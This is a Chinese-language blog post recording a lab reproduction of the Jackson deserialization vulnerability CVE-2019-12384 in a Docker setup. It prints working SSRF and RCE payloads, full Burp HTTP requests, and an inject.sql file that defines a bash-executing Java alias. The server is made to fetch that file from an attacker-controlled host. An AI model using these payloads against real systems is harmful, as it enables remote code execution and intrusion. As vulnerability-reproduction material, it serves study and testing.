Jackson CVE-2019-12384 RCE 复现记录

漏洞概述

Jackson库对 JSON 进行反序列化的时候,存在反序列化漏洞,控制好反序列化的类,就能触发服务端请求伪造(SSRF)和远程代码执行漏洞(RCE)。
漏洞原理和分析参考:

漏洞环境

运行漏洞环境:

1
2
3
git clone https://github.com/cnsimo/vu1hub.git
cd vu1hub/jackson/CVE-2019-12384-RCE/
docker-compose up -d

命令执行成功后,需要等待以后,之后访问http://your-ip:8080 即可访问 jackson 的测试页面,GET 或 POST 方式传入 POC 即可。

漏洞复现

SSRF

bp 传入 poc:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.80.133:4444/~/test"}]

bp 构造 POC 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /fuckme HTTP/1.1
Host: fuck.me:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.80.133:4444/~/test"}]

成功收到来自服务器的请求:

RCE

bp 传入 poc:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.80.133:8080/inject.sql'"}]

该 poc 利用此服务器的 SSRF 漏洞请求恶意文件。

恶意文件 inject.sql 内容如下:

1
2
3
4
5
6
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('ping 1.1.1.1')

bp 中构造 POC 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /fuckme HTTP/1.1
Host: fuck.me:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencoded

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM'http://192.168.80.133:8080/inject.sql'"}]

进入 docker 容器内部,查看是否存在 ping 1.1.1.1 的进程:

1
2
3
4
# 进入容器内部
docker exec -it jackson-fuckme bash
# 查看进程
ps -ef | grep ping

参考





root@kali ~# cat 重要声明
本博客所有原创文章,作者皆保留权利。转载必须包含本声明,保持文本完整,并以超链接形式注明出处【Techliu】。查看和编写文章评论都需翻墙,为了更方便地获取文章信息,可订阅RSS,如果您还没有一款喜爱的阅读器,不妨试试Inoreader.
root@kali ~# Thankyou!